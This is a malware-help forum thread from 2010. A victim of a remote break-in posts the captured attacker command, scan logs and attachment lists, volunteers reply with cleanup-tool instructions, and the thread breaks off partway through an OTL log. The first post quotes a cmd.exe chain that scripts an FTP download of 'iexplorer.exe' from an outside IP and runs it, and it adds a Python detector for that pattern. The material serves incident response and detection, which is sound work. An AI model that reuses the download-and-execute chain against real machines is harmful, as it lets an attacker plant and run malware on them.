session hijack attempt


  • This topic is locked
18 replies to this topic

#1 deesto

  • Members
  • 33 posts
  • Location: NY, USA

Posted 02 May 2010 - 08:47 AM

Hi,

About a week ago, I happened to notice a command box pop up with some script that someone was trying to run on my computer, I guess in order to try and set up a bot. Luckily I saw it happening (though who knows what was happening before this), and XP popped up a firewall box asking whether a "file transfer" should be blocked. I went crazy afterward trying to find a trace and/or source of this break-in, ran every tool I could think of, and a few trojans did come up, which various tools claimed to clean up. I was able to find the 'eq' file that this session was trying to use.

Since then, I've had IOBit, Avast!, A-Squared, Snort, and PeerBlock all running 24/7, and I've been running intermittent scans with them as well as MalwareBytes. Here is the command window text from that session:
CODE
C:\WINDOWS\system32>del eq&echo open 186.84.54.12 26791 >> eq&echo user 10310 77
51 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer
.exe &del eq
Could Not Find C:\WINDOWS\system32\eq
ftp> open 186.84.54.12 26791
Connected to 186.84.54.12.
220 StnyFtpd 0wns j0
ftp> user 10310 7751
331 Password required
230 User logged in.
ftp> get iexplorer.exe
200 PORT command successful.
150 Opening BINARY mode data connection


Last night, while I was doing something off the computer, I happened to notice that someone/thing was moving the mouse around my screen (at first I thought it was one of those strange USB mouse movements that happen once in a while), and they started trying to change control panel settings and download files. The idiot even tried to fight me for the pointer when I realized it and closed the internet connection. Anyway, by the time I cut it off, they had downloaded a file 'x.exe' and had the control panel open, but I think that's all. I then realized that I had left CopSSH and TightVNC running on startup because I wanted to set up some tunnels from work to home but never got around to it. I have since disabled and removed them both.

Immediately afterward, I scrambled to grab as much log info as I could, including processes, netstat, etc., all while the network connection was disabled. I didn't see much. But I did get the offending remote IP from my router's logs, and I emailed the ISP for more info (doubt they'll even respond).

Here is my HijackThis! log from just now:
CODE
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 9:15:19 AM, on 5/2/2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\a-squared Anti-Malware\a2service.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Digidesign\Drivers\MMERefresh.exe
C:\Program Files\IObit\IObit Security 360\IS360srv.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Logitech\GamePanel Software\LgDevAgt.exe
C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe
C:\Program Files\IObit\IObit Security 360\IS360tray.exe
C:\WINDOWS\system32\wuauclt.exe
C:\PROGRAM FILES\A-SQUARED ANTI-MALWARE\a2guard.exe
C:\Program Files\PeerBlock\peerblock.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\procexp.exe
C:\WINDOWS\system32\cmd.exe
c:\snort\bin\snort.exe
C:\Documents and Settings\The DeStefanos\Desktop\HiJackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office14\GROOVEEX.DLL
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~1\MI1933~1\Office14\URLREDIR.DLL
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [Start WingMan Profiler] C:\Program Files\Logitech\Gaming Software\LWEMon.exe /noui
O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Launch LgDeviceAgent] "C:\Program Files\Logitech\GamePanel Software\LgDevAgt.exe"
O4 - HKLM\..\Run: [Launch LGDCore] "C:\Program Files\Logitech\GamePanel Software\G-series Software\LGDCore.exe" /SHOWHIDE
O4 - HKLM\..\Run: [Launch LCDMon] "C:\Program Files\Logitech\GamePanel Software\LCD Manager\LCDMon.exe"
O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [IJNetworkScanUtility] C:\Program Files\Canon\Canon IJ Network Scan Utility\CNMNSUT.EXE
O4 - HKLM\..\Run: [avast5] C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe /nogui
O4 - HKLM\..\Run: [DigidesignMMERefresh] C:\Program Files\Digidesign\Drivers\MMERefresh.exe
O4 - HKLM\..\Run: [SmartDefrag] "C:\Program Files\IObit\IObit SmartDefrag\IObit SmartDefrag.exe" /StartUp
O4 - HKLM\..\Run: [IObit Security 360] "C:\Program Files\IObit\IObit Security 360\IS360tray.exe" /autostart
O4 - HKLM\..\Run: [nwiz] nwiz.exe /installquiet
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [a-squared] "C:\PROGRAM FILES\A-SQUARED ANTI-MALWARE\a2guard.exe" /d=60
O4 - HKCU\..\Run: [Pidgin] C:\Program Files\Pidgin\pidgin.exe
O4 - HKCU\..\Run: [PeerBlock] C:\Program Files\PeerBlock\peerblock.exe
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [Google Update] "C:\Documents and Settings\The DeStefanos\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c
O4 - S-1-5-18 Startup: Dropbox.lnk = C:\Documents and Settings\The DeStefanos\Application Data\Dropbox\bin\Dropbox.exe (User 'SYSTEM')
O4 - S-1-5-18 Startup: Shortcut to procexp.lnk = C:\Program Files\procexp.exe (User 'SYSTEM')
O4 - S-1-5-18 Startup: Shortcut to SnortStart.lnk = C:\Snort\bin\SnortStart.bat (User 'SYSTEM')
O4 - S-1-5-18 Startup: Wallpaper Changer.lnk = C:\Program Files\WallpaperToy\Wallpapertoy.Exe (User 'SYSTEM')
O4 - S-1-5-18 Startup: Yahoo! Widgets.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe (User 'SYSTEM')
O4 - .DEFAULT Startup: Dropbox.lnk = C:\Documents and Settings\The DeStefanos\Application Data\Dropbox\bin\Dropbox.exe (User 'Default user')
O4 - .DEFAULT Startup: Shortcut to procexp.lnk = C:\Program Files\procexp.exe (User 'Default user')
O4 - .DEFAULT Startup: Shortcut to SnortStart.lnk = C:\Snort\bin\SnortStart.bat (User 'Default user')
O4 - .DEFAULT Startup: Wallpaper Changer.lnk = C:\Program Files\WallpaperToy\Wallpapertoy.Exe (User 'Default user')
O4 - .DEFAULT Startup: Yahoo! Widgets.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe (User 'Default user')
O4 - Startup: Dropbox.lnk = C:\Documents and Settings\The DeStefanos\Application Data\Dropbox\bin\Dropbox.exe
O4 - Startup: Shortcut to procexp.lnk = C:\Program Files\procexp.exe
O4 - Startup: Shortcut to SnortStart.lnk = C:\Snort\bin\SnortStart.bat
O4 - Startup: Wallpaper Changer.lnk = C:\Program Files\WallpaperToy\Wallpapertoy.Exe
O4 - Startup: Yahoo! Widgets.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe
O8 - Extra context menu item: &Save to AnimalsandEarth WallSaver App - res://C:\Program Files\AnimalsandEarth\GoRSDN.dll/GoRSDN.dll.htm
O8 - Extra context menu item: Add to &Evernote - res://C:\Program Files\Evernote\Evernote3.5\enbar.dll/2000
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\MI1933~1\Office14\ONBttnIE.dll/105
O9 - Extra button: Blog This - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: &Blog This in Windows Live Writer - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: Add to Evernote - {E0B8C461-F8FB-49b4-8373-FE32E92528A6} - C:\Program Files\Evernote\Evernote3.5\enbar.dll
O9 - Extra 'Tools' menuitem: Add to Evernote - {E0B8C461-F8FB-49b4-8373-FE32E92528A6} - C:\Program Files\Evernote\Evernote3.5\enbar.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {0D6709DD-4ED8-40CA-B459-2757AEEF7BEE} (Dldrv2 Control) - http://download.gigabyte.com.tw/object/Dldrv.ocx
O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} (Symantec AntiVirus scanner) - http://security.symantec.com/sscv6/SharedContent/vc/bin/AvSniff.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.0.cab
O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} (Symantec RuFSI Utility Class) - http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
O16 - DPF: {EF791A6B-FC12-4C68-99EF-FB9E207A39E6} (McFreeScan Class) - http://download.mcafee.com/molbin/iss-loc/mcfscan/2,2,0,5894/mcfscan.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{A0857F50-D473-47EC-A1D1-253B31834D2B}: NameServer = 192.168.11.1
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: a-squared Anti-Malware Service (a2AntiMalware) - Emsi Software GmbH - C:\Program Files\a-squared Anti-Malware\a2service.exe
O23 - Service: AQLOPB - Unknown owner - C:\DOCUME~1\THEDES~1\LOCALS~1\Temp\AQLOPB.exe (file missing)
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: Digidesign MME Refresh Service (DigiRefresh) - Digidesign, A Division of Avid Technology, Inc. - C:\Program Files\Digidesign\Drivers\MMERefresh.exe
O23 - Service: Firebird Server - MAGIX Instance (FirebirdServerMAGIXInstance) - MAGIX® - C:\Program Files\MAGIX\Common\Database\bin\fbserver.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: IS360service - IObit - C:\Program Files\IObit\IObit Security 360\IS360srv.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe
O23 - Service: NIHardwareService - Native Instruments GmbH - C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies, Inc. - C:\Program Files\WinPcap\rpcapd.exe

--
End of file - 11774 bytes


I will try to add as much other data as I can in attachments, in hopes someone can help figure out if this was a VNC attack or something else that may be lurking.

Thank you!

Attached File  netstat.txt   14.25KB   5 downloads
Attached File  a2scan_100423_221216.txt   22.24KB   8 downloads
Attached File  ps.txt   13.71KB   6 downloads
Attached File  router_log.txt   25.17KB   7 downloads
Attached File  screen.PNG   10.21KB   5 downloads
Attached File  trojan_maybe.txt   529bytes   11 downloads

I've just added a GMER log ... I had to do this in XP safe mode, because when I ran it normally it ended up in a blue screen crash (twice).

I also ran the DDS tool, but this seemed to complete successfully but without creating any log files.

Attached File  gmer.log   11.74KB   7 downloads



Edited by Budapest, 03 May 2010 - 06:30 PM.
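A detection sketch for the command chain shown in the first post, added here as an example and not part of the original thread: it scans a cmd.exe command line for an FTP script assembled with `echo ... >> file`, run with `ftp -s:file`, and followed by execution of the fetched file. The function names, the verdict labels and the second and third sample lines are illustrative assumptions; the first sample is the command from the post with the console line wraps re-joined.

```python
import re

# cmd.exe chains commands with &, && and ||. Quoting and ^-escapes are not
# handled; that is a known limitation of this sketch.
SEP = re.compile(r"\s*(?:&&|\|\||&)\s*")
ECHO = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.I)   # echo <text> >> <file>
FTP = re.compile(r"^ftp(?:\.exe)?\s+(.*)$", re.I)           # ftp <arguments>
SCRIPT_FLAG = re.compile(r"(?:^|\s)-s:(\S+)", re.I)         # -s:<script file>
NO_LOGIN_FLAG = re.compile(r"(?:^|\s)-n(?:\s|$)", re.I)     # -n: no auto-login

# Sample input. Line 1 is taken from the post; lines 2 and 3 are constructed.
SAMPLES = [
    "del eq&echo open 186.84.54.12 26791 >> eq&echo user 10310 7751 >> eq "
    "&echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq "
    "&iexplorer.exe &del eq",
    "echo build finished >> build.log & ftp -s:upload.txt ftp.example.test",
    "echo open 192.0.2.10 >> s.txt & echo user backup >> s.txt & "
    "echo get report.csv >> s.txt & echo bye >> s.txt & ftp -n -s:s.txt",
]


def parse_ftp_script(lines):
    """Extract server, account and fetched files from FTP script lines."""
    info = {"host": None, "port": None, "user": None, "files": []}
    for line in lines:
        words = line.split()
        if not words:
            continue
        verb, args = words[0].lower(), words[1:]
        if verb == "open" and args:
            info["host"] = args[0]
            has_port = len(args) > 1 and args[1].isdigit()
            info["port"] = int(args[1]) if has_port else 21
        elif verb == "user" and args:
            info["user"] = args[0]          # the password is deliberately not kept
        elif verb in ("get", "recv") and args:
            # The local file name defaults to the remote name.
            info["files"].append(args[1] if len(args) > 1 else args[0])
    return info


def analyze(cmdline):
    """Return a finding dict if the command line builds and runs an FTP script."""
    scripts = {}                            # script file name -> echoed lines
    segments = [s for s in SEP.split(cmdline.strip()) if s]
    for i, seg in enumerate(segments):
        m = ECHO.match(seg)
        if m:
            scripts.setdefault(m.group(2).lower(), []).append(m.group(1))
            continue
        m = FTP.match(seg)
        if not m:
            continue
        flag = SCRIPT_FLAG.search(m.group(1))
        if not flag or flag.group(1).lower() not in scripts:
            continue                        # script was not built in this chain
        name = flag.group(1).lower()
        later = segments[i + 1:]
        started = {s.split()[0].lower() for s in later}
        info = parse_ftp_script(scripts[name])
        info["script"] = name
        info["no_autologin"] = bool(NO_LOGIN_FLAG.search(m.group(1)))
        info["executed"] = [f for f in info["files"] if f.lower() in started]
        info["script_deleted"] = any(
            re.match(rf"^(?:del|erase)\s+{re.escape(name)}$", s, re.I)
            for s in later
        )
        info["verdict"] = (
            "download-and-execute" if info["executed"] else "scripted-download"
        )
        return info
    return None


if __name__ == "__main__":
    for sample in SAMPLES:
        print(analyze(sample))
```
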




#2 schrauber

    Mr.Mechanic

  • Malware Response Team
  • 24,794 posts
  • Gender: Male
  • Location: Munich, Germany

Posted 04 May 2010 - 11:00 PM

Hello and welcome to Bleeping Computer

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.

If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.

Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.

If you have already posted a DDS log, please do so again, as your situation may have changed.
Use the 'Add Reply' and add the new log to this thread.


Thanks and again sorry for the delay.

We need to see some information about what is happening in your machine. Please perform the following scan:
  • Download DDS by sUBs from one of the following links. Save it to your desktop.
  • Double click on the DDS icon, allow it to run.
  • A small box will open, with an explanation about the tool. No input is needed, the scan is running.
  • Notepad will open with the results.
  • Follow the instructions that pop up for posting the results.
  • Close the program window, and delete the program from your desktop.
Please note: You may have to disable any script protection running if the scan fails to run. After downloading the tool, disconnect from the internet and disable all antivirus protection. Run the scan, enable your A/V and reconnect to the internet.

Information on A/V control HERE



Please download GMER from one of the following locations and save it to your desktop:
  • Main Mirror
    This version will download a randomly named file (Recommended)
  • Zipped Mirror
    This version will download a zip file you will need to extract first. If you use this mirror, please extract the zip file to your desktop.
  • Disconnect from the Internet and close all running programs.
  • Temporarily disable any real-time active protection so your security programs will not conflict with gmer's driver.
  • Double-click on the randomly named GMER file (i.e. n7gmo46c.exe) and allow the gmer.sys driver to load if asked.
  • Note: If you downloaded the zipped version, extract the file to its own folder such as C:\gmer and then double-click on gmer.exe.


  • GMER will open to the Rootkit/Malware tab and perform an automatic quick scan when first run. (do not use the computer while the scan is in progress)
  • If you receive a WARNING!!! about rootkit activity and are asked to fully scan your system...click NO.
  • Now click the Scan button. If you see a rootkit warning window, click OK.
  • When the scan is finished, click the Save... button to save the scan results to your Desktop. Save the file as gmer.log.
  • Click the Copy button and paste the results into your next reply.
  • Exit GMER and re-enable all active protection when done.
-- If you encounter any problems, try running GMER in Safe Mode.
regards,
schrauber

If I've not posted back within 48 hrs., feel free to send a PM with your topic link. Thank you!

If I have helped you then please consider donating to continue the fight against malware

#3 schrauber


Posted 08 May 2010 - 11:11 PM

Due to the lack of feedback, this topic is now closed.
If you need this topic reopened, please PM a staff member and we will reopen it for you (include the address of this thread in your request). This applies to the original topic starter only. Everyone else with similar problems, please start a new topic.
regards,
schrauber


#4 schrauber


Posted 09 May 2010 - 11:06 PM

Reopened by user request.
regards,
schrauber


#5 deesto


Posted 11 May 2010 - 07:32 AM

OK, fresh DDS log posted. I also ran GMER, which took a very long time. I let it run overnight, and when I clicked "save" this morning for the log, it locked up all 4 of my CPU cores at 100% for 20 minutes before I gave up and decided to manually shut down. I'll run it safe mode later.
Attached File  DDS.txt   26.31KB   5 downloads

Edit: just ran GMER in XP safe mode ... took about 2 hours to complete, and ~89-100% of 4 CPUs while running. Is that normal? But at least in safe mode I was able to save the log file without GMER crashing.
Attached File  gmer_log.log   11.77KB   8 downloads

Edited by deesto, 11 May 2010 - 10:35 AM.


#6 schrauber


Posted 11 May 2010 - 03:15 PM

Hello, deesto
Welcome to the Bleeping Computer Forums. My name is Thomas (Tom is fine), and I will be helping you fix your problems.

If you do not make a reply in 5 days, we will have to close your topic.

You may want to keep the link to this topic in your favourites. Alternatively, you can click the button at the top bar of this topic and Track this Topic. The topics you are tracking can be found here.

Please take note of some guidelines for this fix:
  • Refrain from making any changes to your computer including installing/uninstalling programs, deleting files, modifying the registry, and running scanners or tools. Doing so could cause changes to the directions I have to give you and prolong the time required. Furthermore, you should not be taking any advice relating to this computer from any other source throughout the course of this fix.
  • If you do not understand any step(s) provided, please do not hesitate to ask before continuing. I would much rather clarify instructions or explain them differently than have something important broken.
  • Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean". We do not want to clean you part-way, only to have the system re-infect itself.
  • Please reply using the button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply. Only attach them if requested or if they do not fit into the post.
  • Old topics are closed after 3 days with no reply, and working topics are closed after 5 days. If for any reason you cannot complete instructions within that time, that's fine, just post back here so that we know you're still here.
  • Please set your system to show all files.
    Click Start, open My Computer, select the Tools menu and click Folder Options.
    Select the View Tab. Under the Hidden files and folders heading, select Show hidden files and folders.
    Uncheck: Hide file extensions for known file types
    Uncheck the Hide protected operating system files (recommended) option.
    Click Yes to confirm.





Please go here and have a look how you can disable your security software.

Download Combofix from any of the links below but rename it to before saving it to your desktop.

Link 1
Link 2



--------------------------------------------------------------------

Double click on the renamed Combofix.exe & follow the prompts.
    When finished, it will produce a report for you.
  • As part of its process, ComboFix will check to see if the Microsoft Windows Recovery Console is installed. With malware infections being as they are today, it's strongly recommended to have this pre-installed on your machine before doing any malware removal. It will allow you to boot up into a special recovery/repair mode that will allow us to more easily help you should your computer have a problem after an attempted removal of malware.
  • Follow the prompts to allow ComboFix to download and install the Microsoft Windows Recovery Console, and when prompted, agree to the End-User License Agreement to install the Microsoft Windows Recovery Console.
**Please note: If the Microsoft Windows Recovery Console is already installed, ComboFix will continue its malware removal procedures.



Once the Microsoft Windows Recovery Console is installed using ComboFix, you should see the following message:



Click on Yes, to continue scanning for malware.

When finished, it will produce a log for you. Please include the C:\ComboFix.txt in your next reply.

This tool is not a toy and not for everyday use.
ComboFix SHOULD NOT be used unless requested by a forum helper


If you need help, see this link:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix
regards,
schrauber


#7 deesto


Posted 11 May 2010 - 06:10 PM

ComboFix log attached:
Attached File  ComboFix.txt   36.23KB   9 downloads

I noticed that RegEdit crashed several times during the process (and I had to choose send/don't send to microsoft to continue the process). I also noticed that the app deleted something called EurekaLog, which I thought was some sort of programming debugger ... beyond that, no idea.

#8 schrauber


Posted 13 May 2010 - 02:18 AM

Hi,

Please don't attach the logfiles, just post it here in the thread.



Please download Malwarebytes Anti-Malware and save it to your desktop.
alternate download link 1
alternate download link 2

MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
  • Make sure you are connected to the Internet.
  • Double-click on mbam-setup.exe to install the application.
  • When the installation begins, follow the prompts and do not make any changes to default settings.
  • When installation has finished, make sure you leave both of these checked:
    • Update Malwarebytes' Anti-Malware
    • Launch Malwarebytes' Anti-Malware
  • Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
  • If an update is found, the program will automatically update itself. Press the OK button to close that box and continue.
  • If you encounter any problems while downloading the definition updates, manually download them from here and just double-click on mbam-rules.exe to install.
On the Scanner tab:
  • Make sure the "Perform Quick Scan" option is selected.
  • Then click on the Scan button.
  • If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
  • The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
  • When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
  • Click OK to close the message box and continue with the removal process.
Back at the main Scanner screen:
  • Click on the Show Results button to see a list of any malware that was found.
  • Make sure that everything is checked, and click Remove Selected.
  • When removal is completed, a log report will open in Notepad.
  • The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
  • Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
  • Exit MBAM when done.
Note: If MBAM encounters a file that is difficult to remove, you will be asked to reboot your computer so MBAM can proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot normally (not into safe mode) will prevent MBAM from removing all the malware.




  1. Please download OTL from one of the following mirrors:
  2. Save it to your desktop.
  3. Double click on the icon on your desktop.
  4. Under the Custom Scan box paste this in
    netsvcs
    %SYSTEMDRIVE%\*.exe
    /md5start
    eventlog.dll
    scecli.dll
    netlogon.dll
    cngaudit.dll
    sceclt.dll
    ntelogon.dll
    logevent.dll
    iaStor.sys
    nvstor.sys
    atapi.sys
    IdeChnDr.sys
    viasraid.sys
    AGP440.sys
    vaxscsi.sys
    nvatabus.sys
    viamraid.sys
    nvata.sys
    nvgts.sys
    iastorv.sys
    ViPrt.sys
    eNetHook.dll
    ahcix86.sys
    KR10N.sys
    nvstor32.sys
    ahcix86s.sys
    nvrd32.sys
    symmpi.sys
    adp3132.sys
    mv61xx.sys
    /md5stop
    %systemroot%\*. /mp /s
    CREATERESTOREPOINT
    %systemroot%\system32\*.dll /lockedfiles
    %systemroot%\Tasks\*.job /lockedfiles
    %systemroot%\system32\drivers\*.sys /lockedfiles
    %systemroot%\System32\config\*.sav
    %systemdrive%\*.sys /90 /md5
  5. Push the Quick Scan button.
  6. Two reports will open, copy and paste them in a reply here:
    • OTL.txt <-- Will be opened
    • Extra.txt <-- Will be minimized

regards,
schrauber


#9 deesto


Posted 13 May 2010 - 08:02 AM

Hi, and thank you.

I have MalwareBytes's Anti-Malware and run it regularly; it hasn't found anything.

Can you tell me if you've seen something suspicious in the logs I've posted so far, or if you're prescribing these actions out of caution?

#10 schrauber


Posted 13 May 2010 - 10:31 AM

I will have a deeper look with OTL :)
regards,
schrauber


#11 deesto


Posted 13 May 2010 - 08:18 PM

QUOTE(schrauber @ May 13 2010, 11:31 AM)
I will have a deeper look with OTL :)

OK.
OTL.txt:
CODE
OTL logfile created on: 5/13/2010 8:32:43 PM - Run 1
OTL by OldTimer - Version 3.2.4.1     Folder = C:\Documents and Settings\Me\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

3.00 Gb Total Physical Memory | 2.00 Gb Available Physical Memory | 76.00% Memory free
5.00 Gb Paging File | 4.00 Gb Available in Paging File | 86.00% Paging File free
Paging file location(s): C:\pagefile.sys 2046 4092 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 100.08 Gb Total Space | 72.00 Gb Free Space | 71.95% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
E: Drive not present or media not loaded
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded
Drive J: | 931.51 Gb Total Space | 19.51 Gb Free Space | 2.09% Space Free | Partition Type: NTFS

Computer Name: Mine
Current User Name: Me
Logged in as Administrator.

Current Boot Mode: Normal
